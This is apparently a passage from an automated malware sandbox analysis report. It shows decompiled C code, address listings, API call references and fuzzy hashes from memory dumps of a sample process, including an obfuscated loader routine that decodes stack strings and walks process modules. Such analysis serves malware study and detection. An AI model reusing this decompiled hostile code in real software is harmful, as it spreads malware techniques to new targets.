										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                  0x0040baaa
                                                                                                                                                  0x0040baba
                                                                                                                                                  0x0040bae0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bac1
                                                                                                                                                  0x0040bac1
                                                                                                                                                  0x0040bac4
                                                                                                                                                  0x0040bac6
                                                                                                                                                  0x0040bae7
                                                                                                                                                  0x0040baea
                                                                                                                                                  0x0040baec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040baee
                                                                                                                                                  0x0040baf3
                                                                                                                                                  0x0040baf6
                                                                                                                                                  0x0040baf9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x0040bb02
                                                                                                                                                  0x0040bb09
                                                                                                                                                  0x0040bb0c
                                                                                                                                                  0x0040bb0f
                                                                                                                                                  0x0040bb11
                                                                                                                                                  0x0040bb1b
                                                                                                                                                  0x0040bb13
                                                                                                                                                  0x0040bb16
                                                                                                                                                  0x0040bb16
                                                                                                                                                  0x0040bb22
                                                                                                                                                  0x0040bb24
                                                                                                                                                  0x0040bbe9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x0040bb33
                                                                                                                                                  0x0040bb64
                                                                                                                                                  0x0040bb64
                                                                                                                                                  0x0040bb67
                                                                                                                                                  0x0040bbc0
                                                                                                                                                  0x0040bbc7
                                                                                                                                                  0x0040bbca
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x0040bbf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbfb
                                                                                                                                                  0x0040bbcc
                                                                                                                                                  0x0040bbcf
                                                                                                                                                  0x0040bbd2
                                                                                                                                                  0x0040bbd3
                                                                                                                                                  0x0040bbd6
                                                                                                                                                  0x0040bbd8
                                                                                                                                                  0x0040bbda
                                                                                                                                                  0x0040bbda
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbd8
                                                                                                                                                  0x0040bb69
                                                                                                                                                  0x0040bb6b
                                                                                                                                                  0x0040bb78
                                                                                                                                                  0x0040bb78
                                                                                                                                                  0x0040bb7c
                                                                                                                                                  0x0040bb7e
                                                                                                                                                  0x0040bb82
                                                                                                                                                  0x0040bb84
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb89
                                                                                                                                                  0x0040bb8a
                                                                                                                                                  0x0040bb94
                                                                                                                                                  0x0040bb95
                                                                                                                                                  0x0040bb9a
                                                                                                                                                  0x0040bb9d
                                                                                                                                                  0x0040bba0
                                                                                                                                                  0x0040bc03
                                                                                                                                                  0x0040bc03
                                                                                                                                                  0x0040bc07
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bba2
                                                                                                                                                  0x0040bba2
                                                                                                                                                  0x0040bba4
                                                                                                                                                  0x0040bba6
                                                                                                                                                  0x0040bba8
                                                                                                                                                  0x0040bba8
                                                                                                                                                  0x0040bbaa
                                                                                                                                                  0x0040bbad
                                                                                                                                                  0x0040bbaf
                                                                                                                                                  0x0040bbb1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb1
                                                                                                                                                  0x0040bba0
                                                                                                                                                  0x0040bb6e
                                                                                                                                                  0x0040bb74
                                                                                                                                                  0x0040bb76
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb76
                                                                                                                                                  0x0040bb35
                                                                                                                                                  0x0040bb38
                                                                                                                                                  0x0040bb3a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb3c
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bb42
                                                                                                                                                  0x0040bb44
                                                                                                                                                  0x0040bb46
                                                                                                                                                  0x0040bb48
                                                                                                                                                  0x0040bb48
                                                                                                                                                  0x0040bb50
                                                                                                                                                  0x0040bb55
                                                                                                                                                  0x0040bb58
                                                                                                                                                  0x0040bb5a
                                                                                                                                                  0x0040bb5d
                                                                                                                                                  0x0040bb5f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb24
                                                                                                                                                  0x0040bac8
                                                                                                                                                  0x0040bac8
                                                                                                                                                  0x0040bacd
                                                                                                                                                  0x0040bace
                                                                                                                                                  0x0040bacf
                                                                                                                                                  0x0040bad0
                                                                                                                                                  0x0040bad1
                                                                                                                                                  0x0040bad2
                                                                                                                                                  0x0040bad8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040badd

                                                                                                                                                  APIs
                                                                                                                                                  • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                  • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                  • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                  • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3240763771-0
                                                                                                                                                  • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                  • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                  • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                  • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                  0x004152a9
                                                                                                                                                  0x004152b0
                                                                                                                                                  0x004152c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152b7
                                                                                                                                                  0x004152b9
                                                                                                                                                  0x004152d3
                                                                                                                                                  0x004152d8
                                                                                                                                                  0x004152db
                                                                                                                                                  0x004152de
                                                                                                                                                  0x00415307
                                                                                                                                                  0x0041530e
                                                                                                                                                  0x00415310
                                                                                                                                                  0x00415391
                                                                                                                                                  0x004153ac
                                                                                                                                                  0x004153ae
                                                                                                                                                  0x004152ee
                                                                                                                                                  0x004152ee
                                                                                                                                                  0x004152f1
                                                                                                                                                  0x004152f3
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152fc
                                                                                                                                                  0x00415370
                                                                                                                                                  0x00415370
                                                                                                                                                  0x00415375
                                                                                                                                                  0x0041537b
                                                                                                                                                  0x0041537e
                                                                                                                                                  0x00415380
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415387
                                                                                                                                                  0x00415312
                                                                                                                                                  0x00415315
                                                                                                                                                  0x0041531b
                                                                                                                                                  0x0041531e
                                                                                                                                                  0x00415345
                                                                                                                                                  0x00415348
                                                                                                                                                  0x0041534e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415350
                                                                                                                                                  0x00415353
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415355
                                                                                                                                                  0x00415355
                                                                                                                                                  0x0041535b
                                                                                                                                                  0x0041535e
                                                                                                                                                  0x004152cc
                                                                                                                                                  0x004152cc
                                                                                                                                                  0x00415367
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415367
                                                                                                                                                  0x00415320
                                                                                                                                                  0x00415323
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415327
                                                                                                                                                  0x00415338
                                                                                                                                                  0x0041533e
                                                                                                                                                  0x00415340
                                                                                                                                                  0x00415343
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415343
                                                                                                                                                  0x004152e0
                                                                                                                                                  0x004152e3
                                                                                                                                                  0x004152e5
                                                                                                                                                  0x004152eb
                                                                                                                                                  0x004152eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152bb
                                                                                                                                                  0x004152bb
                                                                                                                                                  0x004152c0
                                                                                                                                                  0x004152c4
                                                                                                                                                  0x004152c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152c0
                                                                                                                                                  0x004152b9

                                                                                                                                                  APIs
                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                  • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                  • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                  • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                  • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                  0x004134e0
                                                                                                                                                  0x004134e6
                                                                                                                                                  0x00413559
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004134ed
                                                                                                                                                  0x004134ed
                                                                                                                                                  0x004134f0
                                                                                                                                                  0x0041350b
                                                                                                                                                  0x0041350e
                                                                                                                                                  0x0041352e
                                                                                                                                                  0x00413540
                                                                                                                                                  0x00413510
                                                                                                                                                  0x00413510
                                                                                                                                                  0x00413513
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00413515
                                                                                                                                                  0x00413527
                                                                                                                                                  0x00413527
                                                                                                                                                  0x00413513
                                                                                                                                                  0x0041355e
                                                                                                                                                  0x00413562
                                                                                                                                                  0x004134f2
                                                                                                                                                  0x0041350a
                                                                                                                                                  0x0041350a
                                                                                                                                                  0x004134f0

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Analysis Process: Owdpdrv.exe PID: 4800 Parent PID: 6760 Owdpdrv.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 05A64C94, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05A67593
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.936841447.0000000005A60000.00000040.00000001.sdmp, Offset: 05A60000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                  • Opcode ID: 9dd2602374aa1e97a67f5edef3b28c4b6258f505e64fb6e738ec7e12e6de77e6
                                                                                                                                                  • Instruction ID: b6690bdcbb064c2a411faba273ac0afd369af4a6268b58fc2ca4f4b9693adc18
                                                                                                                                                  • Opcode Fuzzy Hash: 9dd2602374aa1e97a67f5edef3b28c4b6258f505e64fb6e738ec7e12e6de77e6
                                                                                                                                                  • Instruction Fuzzy Hash: 6F510470D102188FDB14CFA9C889B9DBBB1FF48318F158159E826BB350D778A844CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
